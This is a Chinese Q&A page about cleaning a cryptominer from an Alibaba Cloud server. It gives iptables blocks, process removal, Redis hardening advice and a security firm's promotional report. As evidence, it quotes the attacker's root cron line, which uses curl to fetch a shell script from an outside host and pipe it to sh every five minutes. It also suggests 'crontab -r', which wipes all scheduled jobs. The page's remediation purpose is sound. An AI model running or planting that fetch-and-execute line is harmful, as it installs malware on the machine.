阿里云服务器被挖矿了怎么办？(纯纯电脑小白

Posted 2023-03-28

因为某些原因整了这个服务器，但是发现完全不会用(我是菜鸡)，就一直搁置着，然后这两天发了好几条短信提醒有挖矿程序，咱也不会弄，它那个"处理"又要升级，不想搞。只有升级这一个方法吗？有没有别的方法？不管它会不会有什么事儿？QAQ

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉. 参考技术A 不会有什么事，不过建议你重装服务器，设置快照，这样以后被入侵可以及时回滚。而且不必要的端口要关闭。 参考技术B 春节刚开始，我们SINE安全，发布了2018年服务器被挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础，对这些服务器的被挖矿的整体情况进行了详细的安全分析，为站长以及一些中小企业公司提出了合理的服务器安全防护建议。

在去年的虚拟币市场中，虽然虚拟币经历了暴跌的情况，但是服务器被挖矿的情况还是持续性的增长趋势，背后是一些攻击者利用服务器的漏洞以及网站漏洞进行入侵服务器，拿到服务器权限，在服务器系统里置入木马后门进行挖矿。
下面挖矿的安全报告我们来简要的跟大家分享一下：
去年很多网站系统以及APP应用出现漏洞，phpCMS 注入漏洞，Thinkphp远程代码执行漏洞，dedecms缓存漏洞，ecshop远程写入漏洞，给整个网络安全带来了很大的危害，关于最新的漏洞利

用以及如何产生的漏洞，我们SINE安全对其公开与分享，对网站的漏洞修复以及补丁，及时的告知与相应，让损失降到最低。我们调查分析发现，从网站漏洞被爆出后到修复漏洞的时间约大，一些网站被攻击的状况就越严重，服务器被挖矿的事情就会发生，如果及时的修复漏洞，那么就可以避免被挖矿。
关于服务器被挖矿的安全部署与防护策略
服务器被挖矿的情况时有发生，我们要对服务器进行详细的安全部署，对远程登录的端口进行更改，像windows的3389端口，改掉，SSH的22端口也要改掉，管理员的账号密码也要更改为数字+字母+符号+大小写的组合来，避免被暴力猜解。对网站的漏洞进行安全检测，发现漏洞立即进行修复，打补丁。有些网站使用开源的系统，要定期的检查系统是否需要更新。如果使用的阿里云服务器，要经常登录服务器查看阿里云云盾的安全提醒，如果出现webshell安全提示，以及阿里云挖矿提示，挖矿恶意进程等安全提示，要尽快进行处理，如果对安全不是太懂的话，建议找专业的安全公司处理，国内像SINE安全，绿盟，启明星辰，都是比较专业的。对于一些网站管理员的账号密码，也要加强，数据库mysql,sql2008等数据库的管理员账号密码也要更改，对数据库的端口也要禁止对外。